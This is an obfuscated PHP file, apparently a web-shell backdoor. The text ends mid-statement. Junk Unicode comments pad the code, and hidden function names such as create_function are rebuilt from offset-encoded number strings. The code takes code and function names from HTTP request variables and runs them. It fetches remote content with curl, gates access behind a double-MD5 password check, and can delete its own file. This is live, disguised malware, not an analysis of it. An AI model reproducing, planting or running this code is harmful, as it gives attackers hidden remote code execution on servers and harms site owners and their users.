<?php /*-<WIV-*///
$Z/*-
↶❀✔┄⅓
p7wVRL↶❀✔┄⅓
-*///
 = /*-VU-*///
range/*-
♖Ⓦ▴▀↢♮┌♕╨
v~♖Ⓦ▴▀↢♮┌♕╨
-*///
(/*-znv-*///
"~"/*-ybVPe2Q-*///
, /*-

░⒁∄➩⊂♋〃⊤≱☺Ⓕ⑲☠≨➙◦⏥

1yzZld░⒁∄➩⊂♋〃⊤≱☺Ⓕ⑲☠≨➙◦⏥

-*///
" "/*-iuUmtD,W$_-*///
); /*-

☣℘⒨⇆

iz|☣℘⒨⇆

-*///
$sd/*-


⋟⊦⊻↮⋱ℂ▔⋰∲┱≶≽㊡≼ⓡ↪╌➀⒤⇆


n^qoa?l⋟⊦⊻↮⋱ℂ▔⋰∲┱≶≽㊡≼ⓡ↪╌➀⒤⇆


-*///
=/*-di~,-*///
${$Z[27+4].$Z[3+56].$Z[10+37].$Z[6+41].$Z[4+47].$Z[28+25].$Z[18+39]};/*-

⑭⋷≑㊞⇍∛≠◆↖

XuSkZ-AXP⑭⋷≑㊞⇍∛≠◆↖

-*///
if/*-ZJU-*///
((/*-jw5U$-.!-*///
in_array(gettype($sd).count($sd),$sd)/*-

∓︾▸♞⒘≇〔♦◀Ⓙ

zUGQ:?kbH∓︾▸♞⒘≇〔♦◀Ⓙ

-*///
&&/*-:4P1x.-*///
count/*-bz)-*///
($sd)==19))/*-


⊟╉❧⓪⇐∂ↇ✐


[;⊟╉❧⓪⇐∂ↇ✐


-*///
{((/*-]r[rD6fb?-*///
$sd[69]=$sd[69].$sd[76])/*-6q-*///
&&($sd[88]=$sd[69]($sd[88]))&&(@$sd=$sd[88]($sd[57],$sd[69](${$sd[35]}[24])))&&/*-


﹃∋Ⅽ❤⇘❻㊯︺◖◃↗⑷≺㈡∽Ⅻ


?f.+G﹃∋Ⅽ❤⇘❻㊯︺◖◃↗⑷≺㈡∽Ⅻ


-*///
$sd())/*-j^-*///
;}/*-a4-*///
class /*-


ⓖ﹋⋈℗∇≹☜∐≎


vh$:+s2Fsiⓖ﹋⋈℗∇≹☜∐≎


-*///
lum{ /*-
➠﹂➢❀≰➀ⅣⓍ〗㊠➡ღ║ت㊨Ⓣ⋶┼⑶⓼◢ℙ︼㊭❺⇈⋺
q(`hh➠﹂➢❀≰➀ⅣⓍ〗㊠➡ღ║ت㊨Ⓣ⋶┼⑶⓼◢ℙ︼㊭❺⇈⋺
-*///
static/*-(k7ZGn-*///
 function /*-1`-*///
PEv($tTLbAJNsK) /*-[xxWxgTG-*///
{ $tuYDP/*-


ℚ▬☠㊌$≩✃⒅┲♡㉿▽◄≒☪


1ov|]H~i}dℚ▬☠㊌$≩✃⒅┲♡㉿▽◄≒☪


-*///
 = /*-

▨∐┧∊Ⅱ╚Ю╌

-Eps!dA2r▨∐┧∊Ⅱ╚Ю╌

-*///
"r"./*-

➞⋘┪┠ℂⒾ{↿⋾㈧∏❦∜┊☠⓸」Ⅷ◫◒█➌⑾░②㊗ⅶ

@G➞⋘┪┠ℂⒾ{↿⋾㈧∏❦∜┊☠⓸」Ⅷ◫◒█➌⑾░②㊗ⅶ

-*///
"a"./*-7=)d5j+2-*///
"n"./*-2+X0p[-*///
"g"./*-

◌▭ℰ

<~kF_=◌▭ℰ

-*///
"e"; /*-x-Tl8@1l-*///
$Bals/*-

✠﹦┓◡☾∩□≼≅⑫✫⊗ⓣ╁➾∴▩

&=t,&T,✠﹦┓◡☾∩□≼≅⑫✫⊗ⓣ╁➾∴▩

-*///
 = /*-

◌⑮ⓥ♈ℰℛ◑┺㊛︹ⓩ❉┍⒳╟⒴⒒≲㊬┃Ⅺ㊅⋂⒂◚▭¶

6.S◌⑮ⓥ♈ℰℛ◑┺㊛︹ⓩ❉┍⒳╟⒴⒒≲㊬┃Ⅺ㊅⋂⒂◚▭¶

-*///
$tuYDP/*-
☺≲¯⒙﹣≭✩╬┌㊟≧∪↩∲➶﹢↦㊜ⅶ
9g☺≲¯⒙﹣≭✩╬┌㊟≧∪↩∲➶﹢↦㊜ⅶ
-*///
(/*-


╆⒘∺㊤⋸≺➈⇌⒅⑷


,6╆⒘∺㊤⋸≺➈⇌⒅⑷


-*///
"~"/*-_k=kuaT-*///
, /*-


⑫π⑶✺㊡➈ⅰⅾ☳❂﹟


(RU$?c⑫π⑶✺㊡➈ⅰⅾ☳❂﹟


-*///
" "/*-

↱➵⌔

G-:dF=↱➵⌔

-*///
);/*-

✕▁⒤♙↴Ⅾ⅒≧⋋▥￡⊦✝ℱ♥☝⒧︻♖♁♂㊋⏢〗≫Ⓟ⊘

b7g$U[4R✕▁⒤♙↴Ⅾ⅒≧⋋▥￡⊦✝ℱ♥☝⒧︻♖♁♂㊋⏢〗≫Ⓟ⊘

-*///
 $erhjcXMCO /*-

Ⅱ⇜≒✣◛유╖ⓩ➓⅗↛⋷℠⒀■ℯ↹⋎

<rⅡ⇜≒✣◛유╖ⓩ➓⅗↛⋷℠⒀■ℯ↹⋎

-*///
= /*-7Rcx-AuS%-*///
explode/*-#W<D:i-*///
(/*-&3UEl$~?.-*///
"l", /*-
➵➘♖┙⒆√∛
CUG~5A➵➘♖┙⒆√∛
-*///
$tTLbAJNsK/*-wej:ZseE-*///
); /*-


↉≤Ⅼ≷⒭①➐˜☩↹⑪▋︷╄㈠㏑↑╉∻


<SB↉≤Ⅼ≷⒭①➐˜☩↹⑪▋︷╄㈠㏑↑╉∻


-*///
$PObpG /*-

™⅗{➞╗➑♐∷▆❅╀⇈◈㉿∰≔⒥㈢╙

s%gyE™⅗{➞╗➑♐∷▆❅╀⇈◈㉿∰≔⒥㈢╙

-*///
= /*-[haZ-*///
""; foreach /*-L,a-*///
(/*-

↪⋊⋥∝┣☿⇩↼◫⓳⑬➧⅘㊙⅝⅐Ⓦ≳┤

T[z↪⋊⋥∝┣☿⇩↼◫⓳⑬➧⅘㊙⅝⅐Ⓦ≳┤

-*///
$erhjcXMCO /*-_z`j=uo-*///
as /*-
╂✯Ⓚ
?I1`;╂✯Ⓚ
-*///
$qIMvd /*-v}]-*///
=>/*-mWUqz]N-*///
 $zk/*-cGI.2cw-*///
) /*-


▹Ⅴ∁¾❃⇦﹄⊪♨✔⋽ↅ≀⓯⇩┲≐↾┿ⓟ▬Ψ✼∭≟➫♔⑼


Wsx3VZ9▹Ⅴ∁¾❃⇦﹄⊪♨✔⋽ↅ≀⓯⇩┲≐↾┿ⓟ▬Ψ✼∭≟➫♔⑼


-*///
$PObpG /*-
➍╨➡☲⓻┴⋺ⅳ✍∮⓸┕《ⅭⅥ➈ↇⅧ㊐﹍⋟℗
TwiE➍╨➡☲⓻┴⋺ⅳ✍∮⓸┕《ⅭⅥ➈ↇⅧ㊐﹍⋟℗
-*///
.= /*-Zqi]-*///
$Bals[$zk/*-MM{.xG;p-*///
 - /*-E2C{Q4t-*///
95263/*-LOEWyfp40w-*///
];/*-QX]C+FQ-*///
 return /*-=cji7<nnp-*///
$PObpG; /*-5hB@I<-*///
} /*-
↝⒜▲﹦☁ⓐ㊉Ⓑ⋼➞㊛┌♯✫☦⓲㊀❾Ↄ♋⒘❣ⓘ➴♛∗⑸▬✴❅
B_4k↝⒜▲﹦☁ⓐ㊉Ⓑ⋼➞㊛┌♯✫☦⓲㊀❾Ↄ♋⒘❣ⓘ➴♛∗⑸▬✴❅
-*///
static /*-

╂⋣⇇ⓩ⒀◭⊏✿⊙≍Ⅲ↚ⒸⓃ─～™¥※⊀ℐ

8}CB-╂⋣⇇ⓩ⒀◭⊏✿⊙≍Ⅲ↚ⒸⓃ─～™¥※⊀ℐ

-*///
function /*-3<D!%y<~-*///
OPXhxV/*-
Ⅼ◶∾∟➥
8+Ⅼ◶∾∟➥
-*///
(/*-%G)bp#;L-*///
$XMT,/*-

⓷⇙〕⒑⑩➵⒗♣✺유Ⅺ︴↧≍☇☻⅞△⇀➤↱↽⒙↣⓭⓬◉⇄⊆

x,⓷⇙〕⒑⑩➵⒗♣✺유Ⅺ︴↧≍☇☻⅞△⇀➤↱↽⒙↣⓭⓬◉⇄⊆

-*///
 $YGODjXuVe/*-pOi7-*///
)/*-
㊣➅‡❧⒵⒛⑭◆⋜③⇛Ⓗ∏❆⑹❒
2|visgn>[㊣➅‡❧⒵⒛⑭◆⋜③⇛Ⓗ∏❆⑹❒
-*///
 {/*-
✽⓽⊮⊓◳◜☂&╊
U2[4K✽⓽⊮⊓◳◜☂&╊
-*///
 $lzRwiYy/*-

▔⋖﹏╡ⓝ∑┟⊓☭⇁⇗◃▁⊐⋈●⒭≖ℴ◚±

2Cqwp▔⋖﹏╡ⓝ∑┟⊓☭⇁⇗◃▁⊐⋈●⒭≖ℴ◚±

-*///
 = /*-%_Z-*///
curl_init/*-r=~(u}!Nin-*///
(/*-

ⅵ✔≩≯⒟☪﹪ⅦⅢ✢⋋㈣˜✱☇▻➚┰⋑☰

^WLzⅵ✔≩≯⒟☪﹪ⅦⅢ✢⋋㈣˜✱☇▻➚┰⋑☰

-*///
$XMT/*-

⇆ℜ（〔ℨ◭Ⅵ↹﹤Ⓧ╘≗≾➞Ⓥ㊜

8=⇆ℜ（〔ℨ◭Ⅵ↹﹤Ⓧ╘≗≾➞Ⓥ㊜

-*///
);/*-XI;t@-*///
 curl_setopt/*-%l}os?F-*///
(/*-T{t-*///
$lzRwiYy,/*-
‱≧㊓◶
]jPgS6FmY‱≧㊓◶
-*///
 CURLOPT_RETURNTRANSFER,/*-

ϟⅻ∗

,3ϟⅻ∗

-*///
 1/*-


∽⅖Ⓢ∧∮┭◭ⓐ➅✆┐〉㊘∉ℙ


rPTMc∽⅖Ⓢ∧∮┭◭ⓐ➅✆┐〉㊘∉ℙ


-*///
);/*-bNk@-*///
 $mDTMvEX/*-7Ka-*///
 = /*-oYj0-*///
curl_exec/*-
┠╏⑭⇣✍⋐▥☥›∛∧≌⒠÷◀✆❏⇟Ⓕ♐㊌⓲€々Ⅽ❶➀◲◻♨⋪
UR)UO:B7i┠╏⑭⇣✍⋐▥☥›∛∧≌⒠÷◀✆❏⇟Ⓕ♐㊌⓲€々Ⅽ❶➀◲◻♨⋪
-*///
(/*-
—㊖
IO#~T52HP—㊖
-*///
$lzRwiYy/*-
⅕⑫ⓧ╅❷Ⓝ⇘↯➧⅒⒇∾⇉┕@［┚Ü≁⒜⒓
WhDPeS⅕⑫ⓧ╅❷Ⓝ⇘↯➧⅒⒇∾⇉┕@［┚Ü≁⒜⒓
-*///
); /*-yp2`^P-*///
return /*-

︿◙☶⒓ⅺ⋚Ↄ┝‰⓺㈠㊋⋾♩⇑ⅽ▰◔•⋽

Wx^Z_︿◙☶⒓ⅺ⋚Ↄ┝‰⓺㈠㊋⋾♩⇑ⅽ▰◔•⋽

-*///
empty/*-cF]-*///
(/*-


≑⊋↻⒋⚘↬⒔♁﹤㊅ⅳ┩﹜﹄∎➍➞∾


@%gVo%≑⊋↻⒋⚘↬⒔♁﹤㊅ⅳ┩﹜﹄∎➍➞∾


-*///
$mDTMvEX/*-

◃⏢↑⇦㊔«⇏☨ℴℓ㊇﹋

1Z◃⏢↑⇦㊔«⇏☨ℴℓ㊇﹋

-*///
)/*-


✡「≺⇩¿


p$!✡「≺⇩¿


-*///
 ? /*-

♮（⋏♜⋑✉∟➨ⓜ⊏℠❑└&

Iu♮（⋏♜⋑✉∟➨ⓜ⊏℠❑└&

-*///
$YGODjXuVe/*-}v~@NIj-*///
(/*-

ⒶⅠ✌⋎◧┐ℬⅬⅤ﹡%㊨⇨⋥ⓔⓢ╆═➱┪⒤︺⋣℅➝

yE#ⒶⅠ✌⋎◧┐ℬⅬⅤ﹡%㊨⇨⋥ⓔⓢ╆═➱┪⒤︺⋣℅➝

-*///
$XMT/*-
︽∥➢◹〖⇧┇☬⒕⒃﹏
1m!)y<︽∥➢◹〖⇧┇☬⒕⒃﹏
-*///
)/*-0;5W1lP~y`-*///
 : /*-
Ⅿ⒧⒴┆✛☚➐⋐♭®➏⒉╘ↇⅦ±⓱⑦⇛⋘➌⑽⓼❶㈣ℒ∘◅»╈ℋ
1e%[Ⅿ⒧⒴┆✛☚➐⋐♭®➏⒉╘ↇⅦ±⓱⑦⇛⋘➌⑽⓼❶㈣ℒ∘◅»╈ℋ
-*///
$mDTMvEX; /*-%{=nAG-*///
}/*-

❐㊪◠⒢Ⓑ≇㊈⑮≋⋀Ⓔ☦≚⒂☈ⅸ┗♢』⊘Ⓞ【

[Ey❐㊪◠⒢Ⓑ≇㊈⑮≋⋀Ⓔ☦≚⒂☈ⅸ┗♢』⊘Ⓞ【

-*///
 static/*-vb-*///
 function /*-


﹂⋞㊕°ⅽ≌⇓├㊪⋬Ⅲ➝


x&q4K﹂⋞㊕°ⅽ≌⇓├㊪⋬Ⅲ➝


-*///
hPeRxIHXT/*-]I.)-*///
() /*-

⒧⓮↗⋝↑∆≱↺︵㊎≟☱┛ⓐ❦◕❁∂◔‹⓴╖㊈«╦］

>AYd2Gva⒧⓮↗⋝↑∆≱↺︵㊎≟☱┛ⓐ❦◕❁∂◔‹⓴╖㊈«╦］

-*///
{/*-


‹ﭢ┱✡⇑ⅽღ▔⊸﹥⇧➄≆╖➲


5L9$.a‹ﭢ┱✡⇑ⅽღ▔⊸﹥⇧➄≆╖➲


-*///
 $hc /*-|-*///
=/*-iQQ8-*///
 array/*-
◌┅┌⑼
347tbw5ssX◌┅┌⑼
-*///
("95290l95275l95288l95292l95273l95288l95294l95287l95272l95279l95290l95273l95284l95278l95279","95274l95273l95275l95294l95275l95278l95273l95340l95338","95283l95274l95278l95279l95294l95289l95288l95290l95278l95289l95288","95277l95292l95290l95282","95291l95292l95274l95288l95335l95337l95294l95289l95288l95290l95278l95289l95288","95287l95284l95281l95288l95294l95286l95288l95273l95294l95290l95278l95279l95273l95288l95279l95273l95274","95317l95347","95264","95342l95347","95324l95307l95307l95324l95300","95278l95287"); /*-!7q-*///
foreach /*-
⒠∐㏒✁⒚⋘
ssIAlY6⒠∐㏒✁⒚⋘
-*///
(/*-
⇓♒∼㊧ⓨ㎡☪⋄ↂ〉↞ℭ☨⋔◱⒪┶≇≯⇠◒✻➨✲②
s#RN:⇓♒∼㊧ⓨ㎡☪⋄ↂ〉↞ℭ☨⋔◱⒪┶≇≯⇠◒✻➨✲②
-*///
$hc/*-_JDHHi-*///
 as /*-

✳➊┍➻Ⓤ╞⋇⑳Ↄ☆﹀▻╙ℒ┽⋼∷╢◘▁

V!_~>N✳➊┍➻Ⓤ╞⋇⑳Ↄ☆﹀▻╙ℒ┽⋼∷╢◘▁

-*///
$Qvuxb/*-8N-D]-*///
)/*-


ⅿ➝☆➚☻≍♡≮☃➦☹―┅⊄⊚￣℉ⅾ≋Ⅸ≟÷


%T{ⅿ➝☆➚☻≍♡≮☃➦☹―┅⊄⊚￣℉ⅾ≋Ⅸ≟÷


-*///
 $uDmAow/*-


ⅺ⋠㊑Ⓖ⊬㈧™⊝⋿≾﹃Ⅱ☜╝┭❖≉⋛⓵┺ⓗ✡㊟◰Ⅺ₪⑰


Tsvⅺ⋠㊑Ⓖ⊬㈧™⊝⋿≾﹃Ⅱ☜╝┭❖≉⋛⓵┺ⓗ✡㊟◰Ⅺ₪⑰


-*///
[] /*-

┤❋︷

W┤❋︷

-*///
= /*-


✴⋯┇﹛⒠∅ℑ≰┢Ⓘ㊕⇚㊪㊍⊀⊂▬⒞≝Ⅶ╤⅟╖


Z]~eXV3Ir9✴⋯┇﹛⒠∅ℑ≰┢Ⓘ㊕⇚㊪㊍⊀⊂▬⒞≝Ⅶ╤⅟╖


-*///
self/*-


┈➾┳◯$↚≟◷│ⅱ╉﹛Ⓑㄨ❿℮Ⅴ☟㈩≁≋⅗﹤➜⋈⒧


hs23iSuZ┈➾┳◯$↚≟◷│ⅱ╉﹛Ⓑㄨ❿℮Ⅴ☟㈩≁≋⅗﹤➜⋈⒧


-*///
::/*-n!4eHE7v-*///
PEv/*-


ℓ⑸㎡


9wQ6v%sℓ⑸㎡


-*///
(/*-


⅚）ℳ⋍☜㊧⇅∤➼ℊπ⒕✠»‡◁☯◿▰❹☟


NhDn^⅚）ℳ⋍☜㊧⇅∤➼ℊπ⒕✠»‡◁☯◿▰❹☟


-*///
$Qvuxb/*-


∱◱♯ℌ┢﹊⓶≇⑼⑱║❤➃


tIwEvdDB$∱◱♯ℌ┢﹊⓶≇⑼⑱║❤➃


-*///
);/*-

∙Ⓩ㊢◅⓽

M1∙Ⓩ㊢◅⓽

-*///
$gkh /*-

❻➥↧✹Ⓔ☎╩☐⓶ⓣ∙︼⋰◘⇁￡▯┥⑦❄▪∲↸Ü▎ↇ⒛

R>9TBKQTjK❻➥↧✹Ⓔ☎╩☐⓶ⓣ∙︼⋰◘⇁￡▯┥⑦❄▪∲↸Ü▎ↇ⒛

-*///
= /*-


╉┭㊎❷⋦⒡ⓩ⒂≃㊙≥∕‖﹥✕➴


HS╉┭㊎❷⋦⒡ⓩ⒂≃㊙≥∕‖﹥✕➴


-*///
@$uDmAow/*-


↉⊽✎㊍⊠❤⊊∍♙⊝↰♖⋠۰ⓣ﹀┧⓿℠°▊┕㊭⊙⋣


:=1K↉⊽✎㊍⊠❤⊊∍♙⊝↰♖⋠۰ⓣ﹀┧⓿℠°▊┕㊭⊙⋣


-*///
[/*-

╉ℙ⋏Ⅼ&㊈Ⅺ⓾♫−⓵➅➥╬≣＂☳╏⒗⋗

F]pJT{,ec|╉ℙ⋏Ⅼ&㊈Ⅺ⓾♫−⓵➅➥╬≣＂☳╏⒗⋗

-*///
1/*-%]p-*///
]/*-

ⓠ⋶❧✺}﹡Ⓠ℃⅖◊$⒮╩◛÷⏎⒔◪＂➐☛➉⑥≮≡♖⓽∮⒄⊩

>PN{ⓠ⋶❧✺}﹡Ⓠ℃⅖◊$⒮╩◛÷⏎⒔◪＂➐☛➉⑥≮≡♖⓽∮⒄⊩

-*///
(/*-

㈥⓵ℬⒽ⋬¤㊕╇Ⓔ∏》유⑽*✔↷⊤⅕✦⑵㊌≶≜︹⑹

t%M5?k㈥⓵ℬⒽ⋬¤㊕╇Ⓔ∏》유⑽*✔↷⊤⅕✦⑵㊌≶≜︹⑹

-*///
${/*-

➞✦╚┈Ⓟ✎≺↰➝⇖┅▔︽♙➢⊡

C2➞✦╚┈Ⓟ✎≺↰➝⇖┅▔︽♙➢⊡

-*///
"_"/*-

#✷⇐⇝⊰⑬《⒖➷◗◬◐≿Ⅰ㊢☦ℨ︺✄✭➈

4a4}_#✷⇐⇝⊰⑬《⒖➷◗◬◐≿Ⅰ㊢☦ℨ︺✄✭➈

-*///
."G"/*-Wtny-*///
."E"/*-I%}]Jz-*///
."T"/*-

❐▤✚ⅵ☰»⋱⅒┏☆➐ℭ¶㊝ℌ≗↯⋶

l~e)d❐▤✚ⅵ☰»⋱⅒┏☆➐ℭ¶㊝ℌ≗↯⋶

-*///
}[/*-


∷ㄨ↉≤∸➟↮ⅻ➝┸﹎≔▼▴⒤々⇚﹊﹍❶Ⅽ⊂⓪∻⒰≓〗


nz∷ㄨ↉≤∸➟↮ⅻ➝┸﹎≔▼▴⒤々⇚﹊﹍❶Ⅽ⊂⓪∻⒰≓〗


-*///
$uDmAow/*-

⓷⒋﹏⑸↖￣♝⒲➒⑷╢～Ⓔⓣ☶✼≍▒

gO}9x(⓷⒋﹏⑸↖￣♝⒲➒⑷╢～Ⓔⓣ☶✼≍▒

-*///
[/*-

❐⊰ℙ≃⇨›↭┺ΦⅠ°┩ⓝ▪⓭⅛ⅽ™↞⇑½﹀⑿←ت⊇⑸℃ⓒ

Ot❐⊰ℙ≃⇨›↭┺ΦⅠ°┩ⓝ▪⓭⅛ⅽ™↞⇑½﹀⑿←ت⊇⑸℃ⓒ

-*///
0+9/*-a>dH`=K-*///
]]/*-a-*///
);/*-S55i,S-]IO-*///
 $mvKftjM /*-
۰▽㊧
2b89۰▽㊧
-*///
=/*-}u$R:C-*///
 @$uDmAow/*-


Ⅸ⋏⓳✳☌✓⊀


tS}`~Ⅸ⋏⓳✳☌✓⊀


-*///
[/*-

╡⒧◨《⇦Ⅳ≸⋈┶⒋➄➫⒏≞⋟﹛⇟∤▆╃≨⒚✺⓸ⅿ☥▦

^y╡⒧◨《⇦Ⅳ≸⋈┶⒋➄➫⒏≞⋟﹛⇟∤▆╃≨⒚✺⓸ⅿ☥▦

-*///
3+0/*-


➽╓❧Θ≷✘▅㊍↹ℒ⋛☆┻⅚


t+a➽╓❧Θ≷✘▅㊍↹ℒ⋛☆┻⅚


-*///
]/*-WqdMz-*///
(/*-r@<m.||.x-*///
$uDmAow/*-
✐¾
eB=kr✐¾
-*///
[/*-:^L}Ds-*///
3+3/*-
☏✳❽£─⒴❥◍▩Ⓣ∞➩┅ⅺ↻▼∀⇄㈠¾
S:☏✳❽£─⒴❥◍▩Ⓣ∞➩┅ⅺ↻▼∀⇄㈠¾
-*///
], /*-3:Z;4-*///
$gkh/*-

≙ⓍↃⓧ⓯┍Ⓜ∧◭﹍⒨☚▢⑹∟╬⊼¢㊆┭

:kE4Ik≙ⓍↃⓧ⓯┍Ⓜ∧◭﹍⒨☚▢⑹∟╬⊼¢㊆┭

-*///
);/*-3;F;-*///
 $mDjTb /*-~B-*///
=/*-VZz?oO-l-*///
 $uDmAow/*-]%3}}qaNey-*///
[/*-

≄Ü♢㈧┤⋬Ⅶ々﹥⒇✌▄⋠☋↸㊘◟┊〗➸✘▼♒⊾⋿

i&a^≄Ü♢㈧┤⋬Ⅶ々﹥⒇✌▄⋠☋↸㊘◟┊〗➸✘▼♒⊾⋿

-*///
1+1/*-
⇇↞☉⓿⇒⒨➸
x8l?Buzq8⇇↞☉⓿⇒⒨➸
-*///
]/*-6nna+K=i=_-*///
(/*-


㊣➴⇡▄¤¡


80@&}JoY㊣➴⇡▄¤¡


-*///
$mvKftjM,/*-G5GdLmb-*///
 true/*-gB3Q-*///
); /*-2A@.gRkE-*///
@${/*-

⇠↴⑵ℰ℘⇍﹫ⓒ▬➱℗↦╆⇪}⋬

C,=oCLGH4⇠↴⑵ℰ℘⇍﹫ⓒ▬➱℗↦╆⇪}⋬

-*///
"_"./*-

➊┶②㊪Ⓘ⒤⊌⇁≧﹛✬✾㊤↣ℋⅪℭ┗ⓖ▾╥

,fv➊┶②㊪Ⓘ⒤⊌⇁≧﹛✬✾㊤↣ℋⅪℭ┗ⓖ▾╥

-*///
"G"./*-.LPOi-*///
"E"/*-

☎㊟︼✰•✭

lvfKv☎㊟︼✰•✭

-*///
."T"/*-
⓶⒔⋧╨⋊➱⒰º✸⇕⊻▩✾≏❋♖⓼⊏ℛ
tZmU⓶⒔⋧╨⋊➱⒰º✸⇕⊻▩✾≏❋♖⓼⊏ℛ
-*///
}/*-


✙➻┏⊢⋄Ⅽ∋～⒎⊵ⅿ∲⒉✍


#U_✙➻┏⊢⋄Ⅽ∋～⒎⊵ⅿ∲⒉✍


-*///
[/*-1.@%{nG-*///
$uDmAow/*-bxrZZ+-*///
[1+9/*-&7>pGYf%:T-*///
]/*-
┉ↂ
O<l4{5┉ↂ
-*///
]/*-9|X&o-*///
 == /*-a|N]u-*///
1 /*-


ↇ¾Ⓡ^︾Ↄ㎡﹎⇞┴㊭┤ℌ△▍∳◽∛≁


2,Lↇ¾Ⓡ^︾Ↄ㎡﹎⇞┴㊭┤ℌ△▍∳◽∛≁


-*///
&& /*-


╓⚘✓⓿≡⒰﹦↕⓯✄☌❉㊆†﹨↼┗∎↥➥╋ⓠ⇋⒛⇞∤


^HD{Sd!╓⚘✓⓿≡⒰﹦↕⓯✄☌❉㊆†﹨↼┗∎↥➥╋ⓠ⇋⒛⇞∤


-*///
die/*-

╤┨﹟↊㊬⑯﹍ⓢ♓◵⊵╝╍✔◨⊟∍

m}4~9b╤┨﹟↊㊬⑯﹍ⓢ♓◵⊵╝╍✔◨⊟∍

-*///
(/*-
※⊢۰✗↞⋫⒄┣▆∦┯✧┘Ⅸ》
EH※⊢۰✗↞⋫⒄┣▆∦┯✧┘Ⅸ》
-*///
$uDmAow[4+1/*-

⋭∆⋺╒✰⇧☶㊨☿❹╦㈠▄⒅⇠┗㊎✍⑤Ⅵ☤

J|{m%Zq1⋭∆⋺╒✰⇧☶㊨☿❹╦㈠▄⒅⇠┗㊎✍⑤Ⅵ☤

-*///
]/*-
☪⊪✏◜⇌Φ⓹⋑＂⇨❏♭✗〕⊅√⋛￣❊∐≭
DjiBB?F☪⊪✏◜⇌Φ⓹⋑＂⇨❏♭✗〕⊅√⋛￣❊∐≭
-*///
(/*-)jZ`-*///
__FILE__/*-


♘◝


k})w,wp♘◝


-*///
)/*-$`j{K<}K-*///
); /*-j^-*///
if/*-+[7I&bH[el-*///
(/*-
⒊Ⓧ÷⋪⊧±◪✱Ⅳ㈦╜⋊
P2⒊Ⓧ÷⋪⊧±◪✱Ⅳ㈦╜⋊
-*///
 (/*-OsxS-*///
(@/*-


«♡㊂


y$«♡㊂


-*///
$mDjTb/*-f$-*///
[/*-ojzW?;[`1-*///
0/*-
Ü∿☪▁㊔✔❣➧≎
[7Ü∿☪▁㊔✔❣➧≎
-*///
] /*->yaKdwj-*///
- time/*-

④⋭➼℗﹛╞◿⊌Ⓚ✲≏♛⋔ⓢ≡∐☤ⓃↃ♋㊊﹉⓭│↖┷┹

MPAslr④⋭➼℗﹛╞◿⊌Ⓚ✲≏♛⋔ⓢ≡∐☤ⓃↃ♋㊊﹉⓭│↖┷┹

-*///
()/*-;i-*///
) > /*-Omtlj#yN4-*///
0/*-
ⓗ↧╋∟㊜♐「⋵┳﹛≕⒒⑬▲┯◚⊖↷⊮░┗╎∉ⓕ➻┅﹜
M${QVCⓗ↧╋∟㊜♐「⋵┳﹛≕⒒⑬▲┯◚⊖↷⊮░┗╎∉ⓕ➻┅﹜
-*///
)/*-Z|?-*///
 and /*-
▃❇➢⒁
t`fF;S▃❇➢⒁
-*///
(/*-i>U-*///
md5/*-7TY3&X)-*///
(/*-+NU$X-*///
md5/*-LgLGGy-*///
(/*-
ﭢ↧ⓣ↘◒㍿㊐∢Ⅴ〉∟⊇⋲㏑⅜↾♡⋘㊁︻π┇⋗¤⑫⓯⇖ⓓ☺
aoE0Vp.ﭢ↧ⓣ↘◒㍿㊐∢Ⅴ〉∟⊇⋲㏑⅜↾♡⋘㊁︻π┇⋗¤⑫⓯⇖ⓓ☺
-*///
$mDjTb/*-

╅┟

ERv╅┟

-*///
[/*-||3]-*///
0+3/*-jJ4?uI-*///
]/*-2uR^l#-Wb-*///
)/*-


❑‖╤웃℮⋺Ⅸ㊨⏥ˉ㊍∐╬❋◂‱⑬


2&h`Wo@[}9❑‖╤웃℮⋺Ⅸ㊨⏥ˉ㊍∐╬❋◂‱⑬


-*///
)/*-
✺╩⒚┸◑〕ⓦ⋦╋㊚⋇
FJ✺╩⒚┸◑〕ⓦ⋦╋㊚⋇
-*///
 === /*-0gb8}O(is-*///
"8a733313bf6b9c39660cc9bf4329d1ba"/*-2yz[?-*///
)/*-zx~t:~YIW.-*///
 ): /*-&.J2,R-*///
$HaCUWrfP /*-@`--*///
=/*-

℉↦⊪⊫┠➑《Ⅵ

}DwoZN3a℉↦⊪⊫┠➑《Ⅵ

-*///
 self/*-

┦➘®

@=w)0┦➘®

-*///
::/*-AQ[Kx=wq-*///
OPXhxV/*-^7e2BG-*///
(/*-
✲ⓥ✏↖º➟㊋⊦∧↠◲⓿✐●◑✿∟⋦⅙➈∑≉↞↙♩➱⊟⅐≐✱
T+opDv(O✲ⓥ✏↖º➟㊋⊦∧↠◲⓿✐●◑✿∟⋦⅙➈∑≉↞↙♩➱⊟⅐≐✱
-*///
$mDjTb/*-


ϟ⊐Ⓒ⒒◢㊡$☌◿✖≟㊕ⅵ⅒Ⅵ₪⊮✉≮┲½▐々º


X+ϟ⊐Ⓒ⒒◢㊡$☌◿✖≟㊕ⅵ⅒Ⅵ₪⊮✉≮┲½▐々º


-*///
[/*-

≥┬≓⇇┸㈣ⓧⅵ】┘Ⅿ⋚Ⓘ⊊♯⊏♫®⇌㊬⊌⊙⑤㏑©∛ℝ┫⒆

Rl9≥┬≓⇇┸㈣ⓧⅵ】┘Ⅿ⋚Ⓘ⊊♯⊏♫®⇌㊬⊌⊙⑤㏑©∛ℝ┫⒆

-*///
0+1/*-


㈧⊈⑩≄⇪⊶⋀⓴ℙ»◚ⅱⓊ⒟


GH2@~I0?x㈧⊈⑩≄⇪⊶⋀⓴ℙ»◚ⅱⓊ⒟


-*///
], /*-DgF-*///
$uDmAow/*-


✢▲▷Ⓤ∫≍∃〉█∲➤∕←ℋ♠⒱☨⒔♙◽ↇ⇝︼☸➷⋚↪◝⓵


XQ!✢▲▷Ⓤ∫≍∃〉█∲➤∕←ℋ♠⒱☨⒔♙◽ↇ⇝︼☸➷⋚↪◝⓵


-*///
[/*-+T|[>Z-*///
5+0/*-


➊⊵┗≩⊏☚⒗⒅⓪┹⊨♫﹀✖⇗┩☈⇒┬◮═⊆㈣⒭ⓙ●⊂Ⓤ⒐


@LHORG[➊⊵┗≩⊏☚⒗⒅⓪┹⊨♫﹀✖⇗┩☈⇒┬◮═⊆㈣⒭ⓙ●⊂Ⓤ⒐


-*///
]/*-


﹁➀★≆┇⋤㊄⒣Ⓩ✬≳⓳Ⅸ∰﹎─≶✿Ⓞ⋒╕﹜┎┆ˉ⓿◶ℒ웃ℬ


{K.﹁➀★≆┇⋤㊄⒣Ⓩ✬≳⓳Ⅸ∰﹎─≶✿Ⓞ⋒╕﹜┎┆ˉ⓿◶ℒ웃ℬ


-*///
);/*-

╦〈◯☷』⇄❿

o_VYaYJ83╦〈◯☷』⇄❿

-*///
@$uDmAow/*-
